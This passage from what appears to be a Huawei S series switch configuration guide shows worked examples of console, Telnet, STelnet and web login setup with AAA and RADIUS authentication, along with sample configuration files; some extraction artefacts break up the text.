ap 1 radio 0
radio-profile id 1
service-set id 1 wlan 1
#
return
l NGFW_1 configuration file

#
sysname NGFW_1
#
vlan batch 428
#
pair-interface 1 GigabitEthernet1/0/0 GigabitEthernet1/0/1
#
portswitch
undo port trunk permit vlan 1
port trunk permit vlan 428
#
portswitch
undo port trunk permit vlan 1
port trunk permit vlan 428
#
firewall zone trust
set priority 85
#
set priority 5
#
security-policy
rule name policy1
source-zone trust
destination-zone untrust
action permit
rule name policy2
source-zone untrust
destination-zone trust

action permit
#
return

Typical Configuration Examples 3 Typical Login Configuration
3 Typical Login Configuration
About This Chapter
3.1 Example for Configuring Switch Login Through a Console Port

3.2 Example for Configuring Telnet Login (Based on ACL Rules and RADIUS
Authentication)
3.3 Example for Configuring STelnet Login (Based on RADIUS Authentication)
3.4 Example for Configuring Switch Login Through the Web System

3.1 Example for Configuring Switch Login Through a

Console Port
Overview
After a PC is connected to a switch through a dedicated console cable, you can perform login
configurations and use the PC to manage the switch.
As the basic login mode, login through a console port is the basis of other login modes such
as Telnet and STelnet login modes. When you log in to a switch for the first time or fail to
remotely log in to a switch, you can log in to the switch through a console port.
Configuration Notes
l Prepare a console cable (delivered with the device). If you use a laptop or a PC without a
serial port, prepare a USB to serial cable and install the driver stored on the CD-ROM
(delivered with the cable) according to instructions.
l Install the terminal emulation software on the PC. You can use the built-in
HyperTerminal of Windows 2000 on the PC. If no built-in terminal emulation software is
available, prepare the terminal emulation software. For details on how to use terminal
emulation software, see the related usage guide or online help. The third-part software
SecureCRT is used as an example here.
l This example applies to all versions and models of S series switches.
The IT maintenance department of a company purchases S series switches, which are
configured by network administrators. A network administrator usually logs in to a new
switch through a console port and then performs initial configurations.
As shown in Figure 3-1, the serial port of a PC is connected to the console port of the Switch
through a console cable. The user wants to log in to the Switch through the console port and
requires local authentication upon the next login. To facilitate remote maintenance on the
Switch, the user wants to configure the Telnet function.
Figure 3-1 Networking diagram for configuring switch login through a console port
Serial port Console port
Console cable
PC Switch
10.1.1.1/24
1. Configure terminal emulation software, set the connected port and communication
parameters, and log in to the Switch.
2. Configure basic information for the Switch, including the date, time, time zone, and
name, to facilitate management.

3. Configure an authentication mode for the console user interface so that the user is
authenticated upon the next login through the console port.
4. Configure the management IP address and Telnet to facilitate remote maintenance on the
Switch.
Procedure
Step 1 Connect the DB9 female connector of the console cable to the COM port on the PC, and
connect the RJ45 connector to the console port on the device, as shown in Figure 3-2.
Figure 3-2 Connecting to the device through the console port
NOTE
l If you use a laptop or a PC without a serial port, prepare a USB to serial cable. Install the driver
stored on the CD-ROM (delivered with the cable) according to instructions, connect the USB-DB9
female connector of the cable to the USB port on the PC, and connect the RJ-45 connector to the
console port on the device.
l If the device has two MPUs, you can log in to the device through the console port on either of the
two MPUs.
Step 2 Configure terminal emulation software and log in to the Switch.

Start terminal emulation software (SecureCRT as an example) on the PC. Establish a

connection, and set the connected port and communication parameters. Table 3-1 lists the
default attribute settings of a console port.
Table 3-1 Default attribute settings of a console port
Parameter Default Setting
Baud rate 9600 bit/s
Flow Control None
Parity None
Stop bits 1
Data bits 8
1. Click to establish a connection, as shown in Figure 3-3.
Figure 3-3 Establishing a connection
2. Set the connected port and communication parameters, as shown in Figure 3-4.
Select the connected port based on actual situations. For example, you can view port
information in Device Manager in the Windows operating system, and select the
connected port.
Communication parameters of terminal emulation software must be consistent with the

default attribute settings of the console port on the Switch, which are 9600 bit/s
transmission rate, 8 data bits, 1 stop bit, no parity check, and no flow control.

NOTE
By default, no flow control mode is configured on the switch. Because RTS/CTS is selected in the
software by default, you need to deselect RTS/CTS; otherwise, you cannot enter commands.
Figure 3-4 Setting the connected port and communication parameters
3. Click Connect. The following information is displayed, prompting you to set a

password. No default password exists upon the first login, and you need to set the login
password. (The following information is only for reference.)
An initial password is required for the first login via the console.
Continue to set it? [Y/N]: y //Configure the login password.
Set a password and keep it safe. Otherwise you will not be able to login via
the console.
Please configure the login password

(8-16)
Enter Password:
Confirm Password:
<HUAWEI>
– The value is a string of 8 to 16 case-sensitive characters without spaces. The

password must contain at least two types of the following: upper-case and lower-
case letters, digits, and special characters except the question mark (?).
– The password entered in interactive mode is not displayed on the screen.
– When you log in to the device again in password authentication mode, enter the
password set during the initial login if you have not modified the authentication
mode and password.
You can run commands to configure the Switch. Enter a question mark (?) whenever you
need help.
Step 3 Configure basic information for the Switch.
# Set the date, time, time zone, and name.

NOTE
The time zone varies depending on the location of a switch. Set the time zone based on the site requirements.
The following information is only for reference.
<HUAWEI> clock timezone BJ add 08:00:00 //BJ is the name of the time zone, and
08:00:00 indicates that the local time is 8 plus the system default UTC time zone.
<HUAWEI> clock datetime 10:10:00 2014-07-26 //Set the current date and time.
Before setting the current time, check the time zone and set a correct time zone
offset to ensure the correct local time.
[HUAWEI] sysname Switch //Set the switch name to Switch.
Step 4 Configure an authentication mode for the console user interface.
# Set the authentication mode of the console interface to AAA, and create a local user.
[Switch] user-interface console 0
[Switch-ui-console0] authentication-mode aaa //Set the authentication mode of
the user to AAA.
[Switch-ui-console0] quit
[Switch] aaa
[Switch-aaa] local-user admin1234 password irreversible-cipher
Helloworld@6789 //Create a local user named admin1234 and set its password to
Helloworld@6789.
[Switch-aaa] local-user admin1234 privilege level 15 //Set the user level to
15.
[Switch-aaa] local-user admin1234 service-type terminal //Set the access type
to terminal, that is, console user.
[Switch-aaa] quit
Step 5 Configure the management IP address and Telnet.
# Configure the management IP address.

[Switch] vlan 10
[Switch-vlan10] interface vlanif 10 //Configure VLANIF 10 as the management
interface.
[Switch-Vlanif10] ip address 10.1.1.1 24
[Switch-Vlanif10] quit
[Switch] interface gigabitethernet 0/0/10 //GE0/0/10 is the physical interface
used for logging in to the switch through the web system on a PC. Select an
interface based on actual networking requirements.
[Switch-GigabitEthernet0/0/10] port link-type access //Set the interface type
to access.
[Switch-GigabitEthernet0/0/10] port default vlan 10 //Add GE0/0/10 to VLAN 10.
# Configure the Telnet function.

[Switch] telnet server enable //Enable Telnet.
[Switch] user-interface vty 0 4 //Enter the user interface views of VTY 0 to
VTY 4.
[Switch-ui-vty0-4] user privilege level 15 //Set the level of users in VTY 0
to VTY 4 to 15.
[Switch-ui-vty0-4] authentication-mode aaa //Set the authentication mode of
users in VTY 0 to VTY 4 to AAA.
[Switch-ui-vty0-4] quit
[Switch] aaa
[Switch-aaa] local-user admin123 password irreversible-cipher Huawei@6789 //
Create a local user named admin1234 and set its password to Huawei@6789.
[Switch-aaa] local-user admin123 privilege level 15 //Set the user level to 15.
[Switch-aaa] local-user admin123 service-type telnet //Set the access type to
telnet, that is, Telnet user.
[Switch-aaa] quit

Enter the user name admin1234 and password Helloworld@6789 to pass identity
authentication before re-logging in to the Switch from the console user interface. You can also
log in to the Switch using Telnet.
----End
Configuration Files
Configuration file of the Switch
#
sysname Switch
#
vlan batch 10
#
telnet server enable
#
clock timezone BJ add 08:00:00
#
aaa
local-user admin123 password irreversible-cipher %^%#}+ysUO*B&+p'NRQR0{ZW7[GA*Z*!
X@o:Va15dxQAj+,$>NP>63de|G~ws,9G%^%#
local-user admin123 privilege level 15
local-user admin123 service-type telnet
local-user admin1234 password irreversible-cipher %^%#}+ysUO*B&
+p'NRQR0{ZW7[GA*Z*!X@o:Va15dxQAj+,$>NP>63de|G~ws,9G%^%#
local-user admin1234 service-type terminal
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
#
user-interface con 0
authentication-mode aaa
user-interface vty 0 4
user privilege level 15
#
return
Related Content
Videos
Log In to a Switch Through the Console Port.
3.2 Example for Configuring Telnet Login (Based on ACL

Rules and RADIUS Authentication)
Overview
Telnet login to a switch facilitates remote management and maintenance on the switch so that
you do not need to connect a terminal to each switch. By default, you cannot log in to a
switch using Telnet. You need to log in to a switch through a console port and configure the
Telnet function first. For the detailed configuration, see 3.1 Example for Configuring Switch
Login Through a Console Port.

An Access Control List (ACL) is a packet filter that filters packets based on rules. One or
more rules describe the packet matching conditions, such as the source address, destination
address, and port number of packets. For packets that match the ACL rules configured on a
device, the device forwards or discards these packets according to the policies used by the
service module to which the ACL is applied.
RADIUS uses the client/server model in distributed mode and protects a network against
unauthorized access. It is often used on networks that require high security and remote user
access control. After Telnet login based on RADIUS authentication is configured, a switch
sends the user name and password of a login user to the RADIUS server. The RADIUS server
then authenticates the user and records the user operations, ensuring network security.
If ACLs and RADIUS authentication are both configured, packets matching ACL rules reach
an upper-layer module and then are authenticated in RADIUS mode based on the user name
and password. The Telnet login mode based on ACL rules and RADIUS authentication
therefore ensures network security.
Configuration Notes
l The Telnet protocol will bring security risks. The STelnet V2 mode is recommended.
l Ensure that the user terminal has reachable routes to the switch and RADIUS server.
l Ensure that the IP address, port number, and shared key of the RADIUS server are
configured correctly on the switch and are the same as those on the RADIUS server.
l Ensure that a user has been configured on the RADIUS server. In this example, the user
admin@huawei.com (in format of user name@domain name) and password
Huawei@1234 have been configured.
NOTE
The following uses the command lines and outputs in V200R006C00 as an example.
The network administrator requires remote management and maintenance on a switch and
high network security for protecting the network against unauthorized access. To meet the
requirements, configure Telnet login based on ACL rules and RADIUS authentication.
As shown in Figure 3-5, the Switch have reachable routes to the administrator and the
RADIUS server. The IP address and port number of the RADIUS server are 10.2.1.1/24 and
1812 respectively.
Figure 3-5 Networking diagram for configuring Telnet login based on ACL rules and
RADIUS authentication
RADIUS Server
10.2.1.1/24
Network
Network Switch
Administrator 10.1.1.1/24
10.137.217.177/24

1. Configure the Telnet protocol so that users can log in to the Switch using Telnet.
2. Configure an ACL rule to ensure that only users matching the ACL rule can log in to the
Switch.
3. Configure the RADIUS protocol to implement RADIUS authentication. After the
configuration is complete, you can use the user name and password configured on the
RADIUS server to log in to the Switch using Telnet, ensuring user login security.
Procedure
Step 1 Configure Telnet login.
[Switch] telnet server enable
VTY 14.
[Switch-ui-vty0-14] protocol inbound telnet //Configure the VTY user interface
to support Telnet. By default, switches in V200R006 and earlier versions support
Telnet, and switches in V200R007 and later versions support SSH.
to VTY 14 to 15.
Step 2 Configure a basic ACL rule.

[Switch] acl 2008
[Switch-acl-basic-2008] rule permit source 10.137.217.177 0
[Switch-acl-basic-2008] quit
[Switch] user-interface vty 0 14
[Switch-ui-vty0-14] acl 2008 inbound //Allow only users matching ACL 2008 in
VTY 0 to VTY 14 to log in to the switch.
Step 3 Configure RADIUS authentication.

# Configure a RADIUS server template on the Switch to implement communication with the
RADIUS server.
[Switch] radius-server template 1 //Enter the RADIUS server template view.
[Switch-radius-1] radius-server authentication 10.2.1.1 1812 //Configure the
RADIUS server.
[Switch-radius-1] radius-server shared-key cipher Huawei@6789 //Set the shared
key of the RADIUS server to Huawei@6789.
[Switch-radius-1] quit
NOTE
If the RADIUS server does not support a user name containing the domain name, run the undo radius-
server user-name domain-included command to configure the Switch to send packets carrying a user
name without the domain name to the RADIUS server.
# Configure an AAA authentication scheme, with the authentication mode being RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme sch1 //Create an authentication scheme
named sch1.
[Switch-aaa-authen-sch1] authentication-mode radius //Set the authentication
mode to RADIUS.
[Switch-aaa-authen-sch1] quit
# Create a domain, and apply the AAA authentication scheme and RADIUS server template
in the domain.

[Switch-aaa] domain huawei.com //Create a domain named huawei.com and enter

the domain view.
[Switch-aaa-domain-huawei.com] authentication-scheme sch1 //Configure the
authentication scheme sch1 for the domain.
[Switch-aaa-domain-huawei.com] radius-server 1 //Apply the RADIUS server
template 1 to the domain.
[Switch-aaa-domain-huawei.com] quit
[Switch-aaa] quit
# Configure the domain huawei.com as the default global management domain so that an
administrator does not need to enter the domain name for logging in to the Switch.
[Switch] domain huawei.com admin

Choose Start > Run as an administrator. Enter cmd to enter the Windows Command Prompt
window. Type telnet 10.1.1.1, and press Enter.
C:\Documents and Settings\Administrator> telnet 10.1.1.1
In the login interface, type the user name admin and password Huawei@1234 as prompted
and press Enter. Authentication succeeds, and you successfully log in to the Switch using
Telnet. (The following information is only for reference.)
Login authentication
Username:admin
Password:
Info: The max number of VTY users is 8, and the number
of current VTY users on line is 2.
The current login time is 2014-07-30 09:54:02+08:00.
<Switch>
----End
Configuration Files
#
sysname Switch
#
domain huawei.com admin
#
#
radius-server template 1
radius-server shared-key cipher %^%#}+ysUO*B&+p'NRQR0{ZW7[GA*Z*!X@o:Va15dxQAj+,
$>NP>63de|G~ws,9G%^%#
radius-server authentication 10.2.1.1 1812 weight 80
#
acl number 2008
rule 5 permit source 10.137.217.177 0
#
aaa
authentication-scheme sch1
authentication-mode radius
domain huawei.com
radius-server 1
#
acl 2008 inbound
protocol inbound telnet

#
return
Related Content
Videos
Remotely Log In to a Switch Using Telnet.
3.3 Example for Configuring STelnet Login (Based on

RADIUS Authentication)
Overview
The Secure Shell (SSH) protocol implements secure remote login on insecure networks,
which ensures data integrity and reliability and guarantees secure data transmission. STelnet,
based on the SSH protocol, ensures information security and provides powerful authentication
function. STelnet protects a switch against attacks such as IP spoofing. By default, you cannot
log in to a switch using STelnet. You need to log in to a switch using a console port or Telnet,
and configure the STelnet function and user interface parameters first.
RADIUS uses the client/server model in distributed mode and protects a network against
unauthorized access. It is often used on networks that require high security and remote user
access control. After STelnet login based on RADIUS authentication is configured, a switch
sends the user name and password of a login user to the RADIUS server. The RADIUS server
then authenticates the user and records the user operations, ensuring network security.
Configuration Notes
l The STelnet V1 protocol will bring security risks. The STelnet V2 mode is
recommended.
l Ensure that the user terminal has SSH server login software installed before configuring
STelnet login. In this example, the third-party software PuTTY is used as the SSH server
login software.
l Ensure that the user terminal has reachable routes to the switch and RADIUS server.
l Ensure that the IP address, port number, and shared key of the RADIUS server are
configured correctly on the switch and are the same as those on the RADIUS server.
l Ensure that a user has been configured on the RADIUS server. In this example, the user
admin@huawei.com (in format of user name@domain name) and password
Huawei@1234 have been configured.
The network administrator requires remote login to a switch and high network security for
protecting the network against unauthorized access. To meet the requirements, configure
STelnet login based on RADIUS authentication.
As shown in Figure 3-6, the Switch functions as the SSH server and has a reachable route to
the RADIUS server. The IP address and port number of the RADIUS server are 10.2.1.1/24
and 1812 respectively.

Figure 3-6 Networking diagram for configuring STelnet login based on RADIUS
authentication
RADIUS Server
10.2.1.1/24
Network
Network Switch
Administrator 10.1.1.1/24
10.137.217.177/24
1. Generate a local key pair on the SSH server to implement secure data exchange between
the server and client.
2. Configure the STelnet protocol so that users can log in to the Switch using STelnet.
3. Configure the RADIUS protocol to implement RADIUS authentication. After the
configuration is complete, you can use the user name and password configured on the
RADIUS server to log in to the Switch using STelnet, ensuring user login security.
Procedure
Step 1 Configure STelnet login.
# Generate a local key pair on the server.
[HUAWEI] dsa local-key-pair create //Generate a local DSA key pair.
Info: The key name will be: HUAWEI_Host_DSA.
Info: The key modulus can be any one of the following : 1024, 2048.
Info: If the key modulus is greater than 512, it may take a few minutes.
Please input the modulus [default=2048]:
Info: Generating keys...
Info: Succeeded in creating the DSA host keys.
# Configure the VTY user interface.

[Switch] stelnet server enable //Enable the STelnet server function.
VTY 14.
to VTY 14 to 15.
[Switch-ui-vty0-14] protocol inbound ssh //Configure the user interface views
in VTY 0 to VTY 14 to support SSH.
# Set the authentication mode of the SSH user admin to password authentication, and service
type to STelnet.
[Switch] ssh user admin authentication-type password //Set the authentication
of the SSH user admin to password authentication.
[Switch] ssh user admin service-type stelnet //Set the service type of the SSH
user admin to STelnet.

NOTE
To configure password authentication for multiple SSH users, run the ssh authentication-type default
password command to specify password authentication as the default authentication mode of SSH
users. After this configuration is complete, you do not need to configure the authentication mode and
service type for each SSH user, simplifying configuration and improving efficiency.

# Configure a RADIUS server template on the Switch to implement communication with the
RADIUS server.
[Switch] radius-server template 1 //Enter the RADIUS server template view.
[Switch-radius-1] radius-server authentication 10.2.1.1 1812 //Configure the
RADIUS server.
[Switch-radius-1] radius-server shared-key cipher Huawei@6789 //Set the shared
key of the RADIUS server to Huawei@6789.
NOTE
If the RADIUS server does not support a user name containing the domain name, run the undo radius-
server user-name domain-included command to configure the Switch to send packets carrying a user
name without the domain name to the RADIUS server.
# Configure an AAA authentication scheme, with the authentication mode being RADIUS.
[Switch] aaa
[Switch-aaa] authentication-scheme sch1 //Create an authentication scheme
named sch1.
[Switch-aaa-authen-sch1] authentication-mode radius //Set the authentication
mode to RADIUS.
# Create a domain, and apply the AAA authentication scheme and RADIUS server template
in the domain.
[Switch-aaa] domain huawei.com //Create a domain named huawei.com and enter
the domain view.
[Switch-aaa-domain-huawei.com] authentication-scheme sch1 //Configure the
authentication scheme sch1 for the domain.
[Switch-aaa-domain-huawei.com] radius-server 1 //Apply the RADIUS server
template 1 to the domain.
[Switch-aaa] quit
# Configure the domain huawei.com as the default global management domain so that an
administrator does not need to enter the domain name for logging in to the Switch.

# Log in to the Switch using PuTTY on the PC. Enter the IP address of the Switch and set the
protocol type to SSH, as shown in Figure 3-7.

Figure 3-7 Connecting to the SSH server using PuTTY
# Click Open. In the login interface, type the user name admin and password Huawei@1234
as prompted and press Enter. Authentication succeeds, and you successfully log in to the
Switch using STelnet. (The following information is only for reference.)
login as: admin
password:
Info: The max number of VTY users is 8, and the number

of current VTY users online is 2.
The current login time is 2014-07-30 09:54:02+08:00.
<Switch>
----End
Configuration Files
#
sysname Switch
#
#
radius-server shared-key cipher %^%#}+ysUO*B&+p'NRQR0{ZW7[GA*Z*!X@o:Va15dxQAj+,
$>NP>63de|G~ws,9G%^%#

#
aaa
domain huawei.com
radius-server 1
#
#
stelnet server enable
ssh user admin
ssh user admin authentication-type password
ssh user admin service-type stelnet
#
return
Related Content
Videos
Remotely Log In to a Switch Using Telnet.
3.4 Example for Configuring Switch Login Through the

Web System
3.4.1 Factory Settings of Web Page Files for S Series Switches
Table 3-2 Factory settings of web page files for S series switches
Product V200R005 V200R006 V200R007 V200R008 V200R009
Model
S12708/ The system software contains a web page file that is loaded.
S12712
S12704 - - - The system The system

software software
contains a contains a
web page web page
file that is file that is
loaded. loaded.
NOTE
A hyphen (-) indicates that the model does not have this version.

3.4.2 Example for Configuring Switch Login Through the Web

System (V200R005)
Overview
As a switch management mode, the web system leverages the built-in web server on a switch
to provide a GUI for users. Users can log in to the web system using HTTPS from terminals
and perform switch management and maintenance.
The web system is available in Classics and EasyOperation versions.
l The EasyOperation version provides rich graphics and a more user-friendly UI on which
users can perform monitoring, configuration, maintenance, and other network operations.
l The Classics version inherits the web page style of Huawei switches and provides
comprehensive configuration and management functions.
Configuration Notes
l This example applies to all models of S series switches in V200R005.
As shown in Figure 3-8, a switch functions as the HTTPS server. The user wants to log in to
the web system using HTTPS to manage and maintain the switch.
Figure 3-8 Networking diagram for configuring switch login through the web system
192.168.0.1/24
Network
PC HTTPS_Server
NOTE
A switch provides a default SSL policy and has a randomly generated self-signed digital certificate in
the web page file. If the default SSL policy and self-signed digital certificate can meet security
requirements, you do not need to upload a digital certificate or manually configure an SSL policy,
simplifying configuration. The following configuration uses the default SSL policy provided by the
switch as an example.
The system software of the following switch models in V200R005 has integrated and loaded
the web page file (including the EasyOperation and Classics editions). You only need to
configure a web user and enter the web system login page.
The Classics web page file has been loaded on the S5700SI, S5700EI, S5710EI, S5700HI,
S5710HI, and S6700EI in V200R005, and has been loaded. To use the Classics web system,
you only need to configure a web user and enter the web system login page. To use the
EasyOperation web system, perform the configuration based on the following roadmap:
1. Configure a management IP address for remotely transferring files and log in to the
switch through the web system.

2. Upload the web page file to the HTTPS server through FTP.
3. Load the web page file.
4. Configure a web user and enter the web system login page.
NOTICE
The FTP protocol will bring risks to network security. The SFTP V2, SCP, or FTPS mode is
recommended.
Procedure
Step 1 Obtain the web page file.
The following methods are available:
l Obtain the web page file from Huawei agent.
l Download the web page file from Huawei enterprise technical support website.
– For a fixed switch, download the system software containing the web page file.
– For a modular switch, download the web page file.
– In V200R005, the web page file is named in format of product name-software
version.web page file version.web.7z.
NOTE
Check whether the size of the obtained web page file is the same as the file size displayed on the
website. If not, an exception may occur during file download. Download the file again.
Step 2 Configure a management IP address.

[HUAWEI] sysname HTTPS_Server
[HTTPS_Server] vlan 10
[HTTPS_Server-vlan10] interface vlanif 10 //Configure VLANIF 10 as the
management interface.
[HTTPS_Server-Vlanif10] ip address 192.168.0.1 24 //Configure the IP address
and deploy the route based on the network plan to ensure reachability between the
PC and switch.
[HTTPS_Server-Vlanif10] quit
[HTTPS_Server] interface gigabitethernet 0/0/10 //In this example, GE0/0/10 is
the physical interface used for logging in to the switch through the web system
on a PC. Select an interface based on actual networking requirements.
[HTTPS_Server-GigabitEthernet0/0/10] port link-type access //Set the interface
type to access.
[HTTPS_Server-GigabitEthernet0/0/10] port default vlan 10 //Add the interface
to VLAN 10.
[HTTPS_Server-GigabitEthernet0/0/10] quit
Step 3 Upload the web page file to the HTTPS server through FTP.
# Configure VTY user interfaces on the HTTPS server.
[HTTPS_Server] user-interface vty 0 14 //Enter VTY user interfaces 0 to 14.
[HTTPS_Server-ui-vty0-14] authentication-mode aaa //Set the authentication mode
of users in VTY user interfaces 0 to 14 to AAA.
[HTTPS_Server-ui-vty0-14] quit
# Configure the FTP function for the device and information about an FTP user, including the
password, user level, service type, and authorized directory.

[HTTPS_Server] ftp server enable //Enable the FTP server function.

[HTTPS_Server] aaa
[HTTPS_Server-aaa] local-user client001 password irreversible-cipher
Helloworld@6789 //Set the login password to Helloworld@6789.
[HTTPS_Server-aaa] local-user client001 privilege level 15 //Set the user level
to 15.
[HTTPS_Server-aaa] local-user client001 service-type ftp //Set the user service
type to FTP.
[HTTPS_Server-aaa] local-user client001 ftp-directory flash:/ //Set the FTP
authorized directory to flash:/.
[HTTPS_Server-aaa] quit
# Log in to the HTTPS server from the PC through FTP and upload the web page file to the
HTTPS server.
Connect the PC to the device using FTP. Enter the user name client001 and password
Helloworld@6789 and set the file transfer mode to binary.
The following example assumes that the PC runs the Windows XP operating system.
C:\Documents and Settings\Administrator> ftp 192.168.0.1
Connected to 192.168.0.1.
220 FTP service ready.
User (192.168.0.1:(none)): client001
331 Password required for client001.
Password:
230 User logged in.
ftp> binary //Set the file transfer mode to binary. By default, files are
transferred in ASCII mode.
200 Type set to I.
ftp>
Upload the web page file to the HTTPS server from the PC.
ftp> put web.7z //Upload the web page file. The web.7z file is used as an
example here.
200 Port command okay.
150 Opening BINARY mode data connection for web.zip
226 Transfer complete.
ftp: 1308478 bytes sent in 11 Seconds 4.6Kbytes/sec.
NOTE
If the size of the web page file in the current directory on the switch is different from that on the PC, an
exception may occur during file transfer. Upload the web page file file again.
Step 4 Load the web page file.

# Load the web page file.
[HTTPS_Server] http server load web.7z //Load the web page file.
Step 5 Enable the HTTPS service.

[HTTPS_Server] http secure-server enable //The HTTPS service is enabled by
default and does not require manual configuration. If the HTTPS service is
manually disabled, run this command to enable it.
Step 6 Configure a web user and enter the web system login page.
# Configure a web user.
[HTTPS_Server] aaa
[HTTPS_Server-aaa] local-user admin password irreversible-cipher
[HTTPS_Server-aaa] local-user admin privilege level 15 //Set the user level to
15.
[HTTPS_Server-aaa] local-user admin service-type http //Set the user service
type to HTTP.

# Enter the web system login page.
Open the web browser on the PC, type https://192.168.0.1 in the address box, and press
Enter. The web system login page is displayed, as shown in Figure 3-9.
You can log in to the EasyOperation web system using the Internet Explorer (8.0 or later),
Firefox (12.0 or later), or Google Chrome (23.0 or later) browsers and to the Classics web
system using the Internet Explorer (8.0 or later) or Firefox (12.0 or later) browsers. If the
version of your web browser is not supported, the web page may be displayed incorrectly.
Additionally, the web browser used to log in to the web system must support JavaScript.
Enter the web user name admin and password Helloworld@6789, and click GO or press
Enter. The web system home page is displayed. The EasyOperation web system is logged in
by default.
Figure 3-9 Web system login page
Log in to the switch through the web system. The login succeeds.
Run the display http server command to view the status of the HTTPS server.
[HTTPS_Server] display http server
HTTP Server Status : enabled
HTTP Server Port : 80(80)
HTTP Timeout Interval : 20

Current Online Users : 0

Maximum Users Allowed : 5
HTTP Secure-server Status : enabled
HTTP Secure-server Port : 443(443)
HTTP SSL Policy : Default
HTTP IPv6 Server Status : disabled
HTTP IPv6 Server Port : 80(80)
HTTP IPv6 Secure-server Status : disabled
HTTP IPv6 Secure-server Port : 443(443)
----End
Configuration Files
Configuration file of the HTTPS_Server
#
sysname HTTPS_Server
#
FTP server enable
#
vlan batch 10
#
http server load web.7z
#
aaa
local-user admin password irreversible-cipher %@%@wU:(2j8~r8Htyu3.]',NwU`Td[-
A9~9"%4Kvhm'0RV[/U`Ww%@%@
local-user admin privilege level 15
local-user admin service-type http
local-user client001 password irreversible-cipher %@%@5d~9:MîpCfL
\iB)EQd>,,ajwsi[\ad,saejin[qndi83Uwe%@%@
local-user client001 privilege level 15
local-user client001 ftp-directory flash:/
local-user client001 service-type ftp
#
interface Vlanif10
ip address 192.168.0.1 255.255.255.0
#
#
#
return
Related Content
Videos
Log In to a Switch Using the Web System.
Log In to a Switch Using the Web System.
Configure a Switch Using the Web System.

3.4.3 Example for Configuring Switch Login Through the Web

System
Overview
As a switch management mode, the web system leverages the built-in web server on a switch
to provide a GUI for users. Users can log in to the web system using HTTPS from terminals
and perform switch management and maintenance.
The web system is available in Classics and EasyOperation versions.

l The EasyOperation version provides rich graphics and a more user-friendly UI on which
users can perform monitoring, configuration, maintenance, and other network operations.
l The Classics version inherits the web page style of Huawei switches and provides
comprehensive configuration and management functions.
Configuration Notes
Web System is not supported in V200R007C20.
This example applies to all versions and models of S series switches.
As shown in Figure 3-10, a switch functions as the HTTPS server. The user wants to log in to
the web system using HTTPS to manage and maintain the switch.
Figure 3-10 Networking diagram for configuring switch login through the web system
192.168.0.1/24
Network
PC HTTPS_Server
l The system software of the switch has integrated and loaded the web page file. No
manual configuration is required.
l A switch provides a default SSL policy and has a randomly generated self-signed digital
certificate in the web page file. If the default SSL policy and self-signed digital
certificate can meet security requirements, you do not need to upload a digital certificate
or manually configure an SSL policy, simplifying configuration. The following
configuration uses the default SSL policy provided by the switch as an example.
l Configure a management IP address for logging in to the switch through the web system.
l Configure a web user and enter the web system login page.

Procedure
Step 1 Configure a management IP address.
[HUAWEI] sysname HTTPS_Server
[HTTPS_Server] vlan 10
[HTTPS_Server-vlan10] interface vlanif 10 //Configure VLANIF 10 as the
management interface.
[HTTPS_Server-Vlanif10] ip address 192.168.0.1 24 //Configure the IP address
and deploy the route based on the network plan to ensure reachability between the
PC and switch.
[HTTPS_Server-Vlanif10] quit
[HTTPS_Server] interface gigabitethernet 1/0/10 //In this example, GE1/0/10 is
the physical interface used for logging in to the switch through the web system
on a PC. Select an interface based on actual networking requirements.
[HTTPS_Server-GigabitEthernet1/0/10] port link-type access //Set the interface
type to access.
[HTTPS_Server-GigabitEthernet1/0/10] port default vlan 10 //Add the interface
to VLAN 10.
[HTTPS_Server-GigabitEthernet1/0/10] quit
Step 2 Enable the HTTPS service.

[HTTPS_Server] http secure-server enable //The HTTPS service is enabled by
default and does not require manual configuration. If the HTTPS service is
manually disabled, run this command to enable it.
Step 3 Configure a web user and enter the web system login page.
# Configure a web user.

[HTTPS_Server] aaa
[HTTPS_Server-aaa] local-user admin password irreversible-cipher
[HTTPS_Server-aaa] local-user admin privilege level 15 //Set the user level to
15.
[HTTPS_Server-aaa] local-user admin service-type http //Set the user service
type to HTTP.
# Enter the web system login page.
Open the web browser on the PC, type https://192.168.0.1 in the address box, and press
Enter. The web system login page is displayed, as shown in Figure 3-11.
Table 3-3 lists browser versions required for login to a switch through the web system. If a
browser or browser patch in an earlier version is used, the web page may not be properly
displayed. Upgrade the browser and browser patch. In addition, the browser must support
JavaScript.
Enter the web user name admin and password Helloworld@6789, and click GO or press
Enter. The web system home page is displayed. The EasyOperation web system is logged in
by default.
Table 3-3 Mapping between the product version and browser version
Product Browser Version for Browser Version for Classic

Version EasyOperation Web System Web System
V200R006 Internet Explorer 8.0 to 11.0, Internet Explorer 8.0 to 11.0, or

Firefox 12.0 to 28.0, or Google Firefox 12.0 to 28.0
Chrome 23.0 to 32.0

Product Browser Version for Browser Version for Classic

Version EasyOperation Web System Web System
V200R007 Internet Explorer 8.0 to 11.0, Internet Explorer 8.0 to 11.0, or

Firefox 12.0 to 32.0, or Google Firefox 12.0 to 32.0
Chrome 23.0 to 37.0
V200R008 Internet Explorer 10.0, Internet Internet Explorer 10.0, Internet

Explorer 11.0, Firefox 31.0 to 35.0, Explorer 11.0, or Firefox 31.0 to
or Google Chrome 30.0 to 39.0 35.0


Figure 3-11 Web system login page

Log in to the switch through the web system. The login succeeds.

Run the display http server command to view the status of the HTTPS server.
[HTTPS_Server] display http server
HTTP Server Status : enabled
HTTP Server Port : 80(80)
HTTP Timeout Interval : 20
Current Online Users : 0
Maximum Users Allowed : 5
HTTP Secure-server Status : enabled
HTTP Secure-server Port : 443(443)
HTTP SSL Policy : Default
HTTP IPv6 Server Status : disabled
HTTP IPv6 Server Port : 80(80)
HTTP IPv6 Secure-server Status : disabled
HTTP IPv6 Secure-server Port : 443(443)
HTTP server source address : 0.0.0.0
----End
Configuration Files
Configuration file of the HTTPS_Server
#
sysname HTTPS_Server
#
vlan batch 10
#
aaa
local-user admin password irreversible-cipher %#%#wU:(2j8~r8Htyu3.]',NwU`Td[-
A9~9"%4Kvhm'0RV[/U`Ww%#%#
local-user admin privilege level 15
local-user admin service-type http
#
interface Vlanif10
ip address 192.168.0.1 255.255.255.0
#
#
return

Typical Configuration Examples 4 Typical File Management Configuration
4 Typical File Management Configuration
About This Chapter
4.1 Example for Logging In to the Device to Manage Files

4.2 Example for Managing Files Using FTP
4.3 Example for Managing Files Using SFTP
4.4 Example for Accessing Files on Other Devices Using TFTP
4.5 Example for Accessing Files on Other Devices Using FTP
4.6 Example for Accessing Files on Other Devices Using SFTP

4.1 Example for Logging In to the Device to Manage Files

Overview
Users can log in to the device using the console port, Telnet, or STelnet to manage storages,
